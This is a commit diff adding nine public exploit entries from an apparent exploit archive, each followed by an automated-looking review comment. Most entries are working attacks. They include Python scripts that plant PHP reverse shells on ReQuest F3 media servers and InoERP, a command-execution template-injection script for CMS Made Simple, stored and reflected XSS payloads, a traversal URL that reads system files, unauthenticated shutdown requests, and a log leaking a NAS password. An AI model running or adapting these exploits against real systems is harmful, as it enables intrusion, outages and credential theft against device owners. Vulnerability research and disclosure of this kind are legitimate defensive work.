DB: 2020-10-27
9 changes to exploits/shellcodes CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored) InoERP 0.7.2 - Remote Code Execution (Unauthenticated) PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS) Genexis Platinum-4410 - 'SSID' Persistent XSS ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
This commit is contained in:
parent
99b2cc4c13
commit
7ce71393bb
10 changed files with 577 additions and 0 deletions
22
exploits/hardware/webapps/48948.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: Persistent XSS in SSID
|
||||
# Date: 10/24/2020
|
||||
# Exploit Author: Amal Mohandas
|
||||
# Vendor Homepage: https://genexis.co.in/product/ont/
|
||||
# Version: Platinum-4410 Software version - P4410-V2-1.28
|
||||
# Tested on: Windows 10
|
||||
|
||||
Vulnerability Details
|
||||
======================
|
||||
Genexis Platinum-4410 Home Gateway Router is vulnerable to stored XSS
|
||||
in the SSID parameter. This could allow attackers to perform malicious
|
||||
action in which the XSS popup will affect all privileged users.
|
||||
|
||||
How to reproduce
|
||||
===================
|
||||
1. Login to the firmware as any user
|
||||
2. Navigate to Net tab--> WLAN
|
||||
3. Enter below mentioned payload in "SSID" text box
|
||||
<script>alert(1)</script>
|
||||
4. Click on the "OK" button.
|
||||
5. Relogin as any user and again navigate to Net tab--> WLAN
|
||||
6. Observe the XSS popup showing persistent XSS
|
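Review bot: The advisory ends at the reproduction steps and carries no remediation or mitigation, so an operator of the device learns what breaks but not what to fix; the same gap is in 48945.txt, 48947.txt, 48949.txt, 48950.txt and 48951.txt in this commit. A closing line such as `Remediation: HTML-encode the SSID (and any other user-controlled field) wherever the WLAN page renders it; vendor fix status unknown at time of writing` would make each file useful beyond the proof of concept. `# Tested on: Windows 10` describes the browser host rather than the device, while the firmware build `P4410-V2-1.28` on the Version line is the value that matters, so consider `# Tested on: Platinum-4410 firmware P4410-V2-1.28 (client: Windows 10)`. The header also lacks the `# CVE : N/A` line the other files in this commit use.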
94
exploits/hardware/webapps/48949.txt
Normal file
|
@ -0,0 +1,94 @@
|
|||
# Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability
|
||||
|
||||
|
||||
Vendor: ReQuest Serious Play LLC
|
||||
Product web page: http://www.request.com
|
||||
Affected version: 3.0.0
|
||||
2.1.0.831
|
||||
1.5.2.822
|
||||
1.5.2.821
|
||||
1.5.1.820
|
||||
|
||||
Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
|
||||
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
|
||||
approved NAS) can be connected through your home network to your ReQuest system,
|
||||
delivering HD video to your television in 1080p via HDMI outputs.
|
||||
|
||||
Desc: The device suffers from an unauthenticated file disclosure vulnerability
|
||||
when input passed through the 'file' parameter in tail.html and file.html script
|
||||
is not properly verified before being used to read web log files. This can be
|
||||
exploited to disclose contents of files from local resources.
|
||||
|
||||
===============================================================================
|
||||
/tail.html:
|
||||
-----------
|
||||
|
||||
function load_data()
|
||||
{
|
||||
|
||||
var elem = $("#data");
|
||||
$.ajax({url:"tail.html",
|
||||
data:{
|
||||
file:elem.attr("file"),
|
||||
start:elem.attr("nextstart"),
|
||||
tail:elem.attr("tail")?elem.attr("tail"):undefined,
|
||||
max:elem.attr("max")?elem.attr("max"):undefined},
|
||||
cache:false,
|
||||
async:true,
|
||||
success:show_data}
|
||||
);
|
||||
}
|
||||
|
||||
function main_start()
|
||||
{
|
||||
|
||||
$("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
|
||||
window.setTimeout(load_data, 1);
|
||||
}
|
||||
|
||||
function show_data(data, status, jqxhr)
|
||||
{
|
||||
var data = $("filedata", data);
|
||||
var newdata = data.attr("data");
|
||||
var start = data.attr("start");
|
||||
var nextstart = data.attr("nextstart");
|
||||
var elem = $("#data");
|
||||
var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
|
||||
elem.attr({tail:"", start:start, nextstart:nextstart});
|
||||
if (newdata.length)
|
||||
elem.append(htmlspecialchars(newdata));
|
||||
var delay = parseFloat(elem.attr("update"))*1000;
|
||||
if (isNaN(delay))
|
||||
delay = 5000;
|
||||
if (at_end)
|
||||
$("html,body").scrollTop($(document).height());
|
||||
window.setTimeout(load_data, delay);
|
||||
}
|
||||
|
||||
$(document).ready(main_start);
|
||||
|
||||
===============================================================================
|
||||
|
||||
Tested on: ReQuestHTTP/0.1 httpserver/0.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5599
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php
|
||||
|
||||
|
||||
01.08.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
|
||||
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini
|
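Review bot: The Desc says the `file` parameter is not properly verified in tail.html and file.html, but the quoted JavaScript is only the browser-side client of tail.html (`load_data`, `main_start`, `show_data`), which forwards `elem.attr("file")` unchanged; nothing shown demonstrates the server-side handling that is actually at fault, so the text should say explicitly that the missing check is in the HTTP server, not in this script. A short remediation line would help defenders, e.g. `Remediation: canonicalize the requested path and reject anything outside the web log directory before opening it; require authentication on tail.html and file.html`. The header has no `# Date:` line although the body carries `01.08.2020` and the index records 2020-10-26; add one so the two can be reconciled.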
76
exploits/hardware/webapps/48950.txt
Normal file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure
|
||||
|
||||
|
||||
Vendor: ReQuest Serious Play LLC
|
||||
Product web page: http://www.request.com
|
||||
Affected version: 7.0.3.4968 (Pro)
|
||||
7.0.2.4954
|
||||
6.5.2.4954
|
||||
6.4.2.4681
|
||||
6.3.2.4203
|
||||
2.0.1.823
|
||||
|
||||
Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
|
||||
into a compact powerhouse. With the ability to add unlimited NAS devices, the
|
||||
F3 can handle your entire family's media collection with ease.
|
||||
|
||||
Desc: The unprotected web management server is vulnerable to sensitive information
|
||||
disclosure vulnerability. An unauthenticated attacker can visit the message_log
|
||||
page and disclose the webserver's Python debug log file containing system information,
|
||||
credentials, paths, processes and command arguments running on the device.
|
||||
|
||||
Tested on: ReQuest Serious Play® OS v7.0.1
|
||||
ReQuest Serious Play® OS v6.0.0
|
||||
Debian GNU/Linux 5.0
|
||||
Linux 3.2.0-4-686-pae
|
||||
Linux 2.6.36-request+lenny.5
|
||||
Apache/2.2.22
|
||||
Apache/2.2.9
|
||||
PHP/5.4.45
|
||||
PHP/5.2.6-1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
Macedonian Information Security Research and Development Laboratory
|
||||
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5600
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php
|
||||
|
||||
|
||||
01.08.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.17/message_log
|
||||
|
||||
...
|
||||
...
|
||||
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
|
||||
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
|
||||
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
|
||||
Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
|
||||
Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
|
||||
Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
|
||||
Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
|
||||
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
|
||||
Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
|
||||
Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
|
||||
Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
|
||||
...
|
||||
...
|
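Review bot: `# Version: 3.0.0` in the header contradicts both the title (7.0.3) and the `Affected version: 7.0.3.4968 (Pro)` line below it; it appears to be carried over from 48949.txt, and the same stale line is in 48951.txt and 48952.txt. Change it in all three to `# Version: 7.0.3.4968`. The log excerpt also reproduces a NAS mount command with a credential (`-u 'admin' -p 'zePassw0rd'`) and a LAN address; if these are not lab fixtures they should be redacted, and either way a remediation line such as `Remediation: require authentication for /message_log and stop logging command lines that contain credentials` would give operators something actionable.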
50
exploits/hardware/webapps/48951.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
|
||||
|
||||
Vendor: ReQuest Serious Play LLC
|
||||
Product web page: http://www.request.com
|
||||
Affected version: 7.0.3.4968 (Pro)
|
||||
7.0.2.4954
|
||||
6.5.2.4954
|
||||
6.4.2.4681
|
||||
6.3.2.4203
|
||||
2.0.1.823
|
||||
|
||||
Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
|
||||
into a compact powerhouse. With the ability to add unlimited NAS devices, the
|
||||
F3 can handle your entire family's media collection with ease.
|
||||
|
||||
Desc: The device can be shutdown or rebooted by an unauthenticated attacker
|
||||
when issuing one HTTP GET request.
|
||||
|
||||
Tested on: ReQuest Serious Play® OS v7.0.1
|
||||
ReQuest Serious Play® OS v6.0.0
|
||||
Debian GNU/Linux 5.0
|
||||
Linux 3.2.0-4-686-pae
|
||||
Linux 2.6.36-request+lenny.5
|
||||
Apache/2.2.22
|
||||
Apache/2.2.9
|
||||
PHP/5.4.45
|
||||
PHP/5.2.6-1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
Macedonian Information Security Research and Development Laboratory
|
||||
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5601
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php
|
||||
|
||||
|
||||
01.08.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
|
||||
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
|
193
exploits/hardware/webapps/48952.txt
Normal file
|
@ -0,0 +1,193 @@
|
|||
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
|
||||
# Exploit Author: LiquidWorm
|
||||
# Software Link: http://request.com/
|
||||
# Version: 3.0.0
|
||||
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
#
|
||||
#
|
||||
# ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution
|
||||
#
|
||||
#
|
||||
# Vendor: ReQuest Serious Play LLC
|
||||
# Product web page: http://www.request.com
|
||||
# Affected version: 7.0.3.4968 (Pro)
|
||||
# 7.0.2.4954
|
||||
# 6.5.2.4954
|
||||
# 6.4.2.4681
|
||||
# 6.3.2.4203
|
||||
# 2.0.1.823
|
||||
#
|
||||
# Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
|
||||
# into a compact powerhouse. With the ability to add unlimited NAS devices, the
|
||||
# F3 can handle your entire family's media collection with ease.
|
||||
#
|
||||
# Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote
|
||||
# code execution vulnerability. Abusing the hidden ReQuest Internal Utilities
|
||||
# page (/tools) from the services provided, an attacker can exploit the Quick
|
||||
# File Uploader (/tools/upload.html) page and upload PHP executable files that
|
||||
# results in remote code execution as the web server user.
|
||||
#
|
||||
# =============================================================================
|
||||
# lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161
|
||||
# Let's see waddup...
|
||||
# Good to go.
|
||||
# Starting handler on port 6161.
|
||||
# Writing callback file...
|
||||
# We got the dir: /75302IV29ZS1
|
||||
# Checking write status...
|
||||
# All is well John Spartan. Calling your listener...
|
||||
# Connection from 192.168.0.17:42057
|
||||
# You got shell.
|
||||
# id;uname -ro
|
||||
# uid=81(apache) gid=81(apache) groups=81(apache),666(arq)
|
||||
# 3.2.0-4-686-pae GNU/Linux
|
||||
# exit
|
||||
# *** Connection closed by remote host ***
|
||||
# lqwrm@metalgear:~/prive$
|
||||
# =============================================================================
|
||||
#
|
||||
# Tested on: ReQuest Serious Play® OS v7.0.1
|
||||
# ReQuest Serious Play® OS v6.0.0
|
||||
# Debian GNU/Linux 5.0
|
||||
# Linux 3.2.0-4-686-pae
|
||||
# Linux 2.6.36-request+lenny.5
|
||||
# Apache/2.2.22
|
||||
# Apache/2.2.9
|
||||
# PHP/5.4.45
|
||||
# PHP/5.2.6-1
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# Macedonian Information Security Research and Development Laboratory
|
||||
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2020-5602
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
|
||||
#
|
||||
#
|
||||
# 01.08.2020
|
||||
#
|
||||
|
||||
from time import sleep
|
||||
import threading######
|
||||
import telnetlib######
|
||||
import requests#######
|
||||
import socket#########
|
||||
import sys############
|
||||
import re#############
|
||||
|
||||
class Manhattan:
|
||||
|
||||
def __init__(self):
|
||||
self.secretagent = "Mushu"
|
||||
self.payload = None
|
||||
self.deploy = None
|
||||
self.rhost = None
|
||||
self.lhost = None
|
||||
self.lport = None
|
||||
|
||||
def the_args(self):
|
||||
if len(sys.argv) != 4:
|
||||
self.the_usage()
|
||||
else:
|
||||
self.rhost = sys.argv[1]
|
||||
self.lhost = sys.argv[2]
|
||||
self.lport = int(sys.argv[3])
|
||||
if not "http" in self.rhost:
|
||||
self.rhost = "http://{}".format(self.rhost)
|
||||
|
||||
def the_usage(self):
|
||||
self.the_wha()
|
||||
print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))
|
||||
print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
def the_wha(self):
|
||||
titl = "ReQuest Serious Play F3 Media Server RCE"
|
||||
print(titl)
|
||||
|
||||
def the_check(self):
|
||||
print("Let's see waddup...")
|
||||
try:
|
||||
r = requests.get(self.rhost + "/MP3/")
|
||||
if "000000000000" in r.text:
|
||||
print("Good to go.")
|
||||
else:
|
||||
print("Something's fishy.")
|
||||
exit(-16)
|
||||
except Exception as e:
|
||||
print("Hmmm {msg}".format(msg=e))
|
||||
exit(-1)
|
||||
|
||||
def the_upload(self):
|
||||
print("Writing callback file...")
|
||||
self.headers = {"Cache-Control" : "max-age=0",
|
||||
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",
|
||||
"User-Agent": self.secretagent,
|
||||
"Accept" : "*/*",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"}
|
||||
|
||||
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + " <&1;rm bd0.php'\");"
|
||||
|
||||
self.deploy = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########
|
||||
self.deploy += "Content-Disposition: form-data; name=\"uploa" #
|
||||
self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T" #
|
||||
self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload
|
||||
self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"
|
||||
self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"
|
||||
self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"
|
||||
|
||||
requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)
|
||||
sleep(1)
|
||||
r = requests.get(self.rhost + "/MP3/")
|
||||
regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]
|
||||
print("We got the dir: /" + regex)
|
||||
print("Checking write status...")
|
||||
r = requests.get(self.rhost + "/MP3/" + regex)
|
||||
if "bd0" in r.text:
|
||||
print("All is well John Spartan. Calling your listener...")
|
||||
else:
|
||||
print("Something...isn't right.")
|
||||
exit(-16)
|
||||
requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")
|
||||
|
||||
def the_subp(self):
|
||||
konac = threading.Thread(name="ZSL", target=self.the_ear)
|
||||
konac.start()
|
||||
sleep(1)
|
||||
self.the_upload()
|
||||
|
||||
def the_ear(self):
|
||||
telnetus = telnetlib.Telnet()
|
||||
print("Starting handler on port {}.".format(self.lport))
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.bind(("0.0.0.0", self.lport))
|
||||
while True:
|
||||
try:
|
||||
s.settimeout(7)
|
||||
s.listen(1)
|
||||
conn, addr = s.accept()
|
||||
print("Connection from {}:{}".format(addr[0], addr[1]))
|
||||
telnetus.sock = conn
|
||||
except socket.timeout as p:
|
||||
print("Hmmm ({msg})".format(msg=p))
|
||||
s.close()
|
||||
exit(0)
|
||||
break
|
||||
|
||||
print("You got shell.")
|
||||
telnetus.interact()
|
||||
conn.close()
|
||||
|
||||
def main(self):
|
||||
self.the_args()
|
||||
self.the_check()
|
||||
self.the_subp()
|
||||
|
||||
if __name__ == '__main__':
|
||||
Manhattan().main()
|
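Review bot: The Desc attributes the issue to the hidden `/tools/upload.html` page, yet `the_upload` posts to `/shared/upload.php` and then lists `/MP3/`; the prose and the code should name the same endpoint(s) so whoever filters or monitors the device knows which path is involved — if the form at /tools/upload.html submits to /shared/upload.php, say so (that relation is not shown here). In `the_ear`, `exit(0)` on the `socket.timeout` branch runs inside a worker thread, where `SystemExit` only ends that thread and the main thread carries on; and the listening socket `s` is never closed on the success path after `conn.close()`. Prefer recording a status the caller checks and releasing `s` in a `finally:` block. The header's `# Version: 3.0.0` has the same mismatch with `Affected version: 7.0.3.4968` noted on 48950.txt.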
55
exploits/php/webapps/48944.py
Executable file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11/10/2017
|
||||
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
|
||||
# Vendor Homepage: http://www.cmsmadesimple.org/
|
||||
# Software Link: N/A
|
||||
# Version: 2.1.6
|
||||
# Tested on: Linux
|
||||
# CVE : CVE-2017-16783
|
||||
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/
|
||||
|
||||
PFA
|
||||
-------
|
||||
Gurkirat Singh
|
||||
(tbhaxor <https://google.com/search?q=tbhaxor>)
|
||||
|
||||
from argparse import ArgumentParser, RawTextHelpFormatter
|
||||
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
|
||||
import requests as http
|
||||
import re
|
||||
from bs4 import BeautifulSoup, Tag
|
||||
from huepy import *
|
||||
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
|
||||
formatter_class=RawTextHelpFormatter)
|
||||
parser.add_argument(
|
||||
"--target",
|
||||
"-t",
|
||||
help="complete remote target with protocol, host, path and query",
|
||||
required=True,
|
||||
dest="t")
|
||||
parser.add_argument("--command",
|
||||
"-c",
|
||||
help="command to execute (default: whoami)",
|
||||
default="whoami",
|
||||
dest="c")
|
||||
args = parser.parse_args()
|
||||
|
||||
print(info("Building malicious url"))
|
||||
url = urlparse(args.t)
|
||||
query = parse_qs(url.query)
|
||||
query["cntnt01detailtemplate"] = [
|
||||
"string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
|
||||
]
|
||||
query = {k: ",".join(v) for k, v in query.items()}
|
||||
query = unquote_plus(urlencode(query, doseq=False))
|
||||
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
|
||||
print(good("Done"))
|
||||
print(info("Executing payload"))
|
||||
r = http.get(_url)
|
||||
html = BeautifulSoup(r.content.decode(), "html5lib")
|
||||
main: Tag = html.find("article", {"id": "main"})
|
||||
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
|
||||
print(good("Done"))
|
||||
print(info("Result"))
|
||||
print(main)
|
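Review bot: The lines `PFA`, `-------`, `Gurkirat Singh` and `(tbhaxor <https://google.com/search?q=tbhaxor>)` between the header block and the imports are a mail signature pasted in verbatim; they are not comments, so the file as committed does not parse (`-------` on its own is a syntax error). Either drop them or prefix each with `#`. Separately, `from huepy import *` hides where `info` and `good` come from and pulls in a non-standard package without saying so; `from huepy import info, good` plus a header comment listing the third-party dependencies (`huepy`, `requests`, `bs4`, `html5lib`) would document what a reader needs before running it.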
19
exploits/php/webapps/48945.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)
|
||||
# Google Dork: N/A
|
||||
# Date: 2020/10/24
|
||||
# Exploit Author: Akıner Kısa
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14526/online-health-care-system-php-full-source-code-2020.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/healthcare_0.zip
|
||||
# Version: 1.0
|
||||
# Tested on: XAMPP
|
||||
# CVE : N/A
|
||||
|
||||
Vulnerable Pages:
|
||||
http://localhost/healthcare/Users/registration.php
|
||||
http://localhost/healthcare/Doctor/doctor_registration.php
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
1 - Go to vulnerable pages and fill the "First Name" and "Last Name" blanks with <script>alert(1)</script> payload.
|
||||
|
||||
2 - And check user/doctor account on admin panel or http://localhost/healthcare/admin/user_detail.php?id=<userid> adres.
|
28
exploits/php/webapps/48946.py
Executable file
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: UTF-8 -*-
|
||||
|
||||
# Exploit Title: InoERP 0.7.2 Unauthenticated Remote Code Execution
|
||||
# Date: March 14, 2020
|
||||
# Exploit Author: Lyhin's Lab
|
||||
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/03/14/inoerp-ab-rce/
|
||||
# Software Link: https://github.com/inoerp/inoERP
|
||||
# Version: 0.7.2
|
||||
# Tested on: Ubuntu 19
|
||||
|
||||
import requests
|
||||
import os
|
||||
import sys
|
||||
|
||||
if len (sys.argv) != 4:
|
||||
print ("specify params in format: python inoerp.py target_url attacker_ip listening_port")
|
||||
else:
|
||||
target_url = sys.argv[1]
|
||||
attacker_ip = sys.argv[2]
|
||||
listening_port = sys.argv[3]
|
||||
target_url += "/modules/sys/form_personalization/json_fp.php"
|
||||
target_headers = {"Accept": "*/*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}
|
||||
code = "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'\");".format(attacker_ip, listening_port)
|
||||
expl_data = {"get_fp_from_form": "true", "template_code": code, "obj_class_name": ''}
|
||||
|
||||
requests.post(target_url, headers=target_headers, data=expl_data)
|
||||
print ("Check your listener.")
|
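Review bot: `import os` is never used and should be dropped. The return value of `requests.post(...)` is discarded, so `Check your listener.` is printed even when the request failed or the server returned an error status; binding it to a name and reporting `r.status_code` would make the output honest. The shebang `#!/usr/bin/python` does not say whether Python 2 or 3 is intended — the `print (...)` calls run on both — so `#!/usr/bin/env python3` would be unambiguous, and the header lacks the `# CVE :` and `# Vendor Homepage:` lines the other files in this commit carry.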
31
exploits/php/webapps/48947.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: PDW File Browser <= v1.3 - Cross-Site Scripting (XSS)
|
||||
# Date: 24-10-2020
|
||||
# Exploit Author: David Bimmel
|
||||
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
|
||||
# Vendor Homepage: n/a
|
||||
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
|
||||
# Version: <=1.3
|
||||
|
||||
The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a stored and Reflected XSS vulnerability which results in code execution within the browser of an authenticated user. This vulnerability can be exploited when an authenticated user visits the crafted URL (i.e. when phished or when visiting a website containing the URL).
|
||||
|
||||
Stored XSS:
|
||||
The stored XSS is a result of insufficient input sanitization within the 'rename' functionality within the PDW file browser.
|
||||
Below I have provided an example request were the filename (FILE.txt) is replaced with an XSS payload (<svg onload=alert(document.cookies)>). The payload gets executed when any authenticated user navigates to the PDW File browser page.
|
||||
|
||||
POST /ckeditor/plugins/pdw_file_browser/actions.php
|
||||
HTTP/1.1 Host: <HOSTNAME>
|
||||
[…]
|
||||
action=rename&new_filename=<svg+onload=alert(document.cookie
|
||||
s)>&old_filename=script%253EFILE.txt&folder=%252Fmedia%252F&typ
|
||||
e=file
|
||||
|
||||
Reflected XSS:
|
||||
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.
|
||||
|
||||
https://<HOSTNAME>/ckeditor/plugins/pdw_file_browser/file_spe
|
||||
cs.php?ajax=true&path=%3Csvg+onload=alert(document.cookies)%
|
||||
3E&type=file
|
||||
|
||||
|
||||
|
||||
Happy Hacking :^)
|
|
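Review bot: The example request body starting at `action=rename&new_filename=` is wrapped across three lines (`...document.cookie`, `s)>&old_filename=...`, `e=file`), which reads as if the parameters were split mid-token; keep the request on one line or set it off as an indented block so the boundaries are clear, and the same applies to the reflected example URL (`file_spe` / `cs.php?...`). `old_filename=script%253EFILE.txt` carries a double-encoded remnant that the prose (`FILE.txt`) does not explain; either use the plain name or say why it is encoded. The header gives `# Vendor Homepage: n/a` while `# Software Link` already points at the GitHub repository, which can stand in as the homepage.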
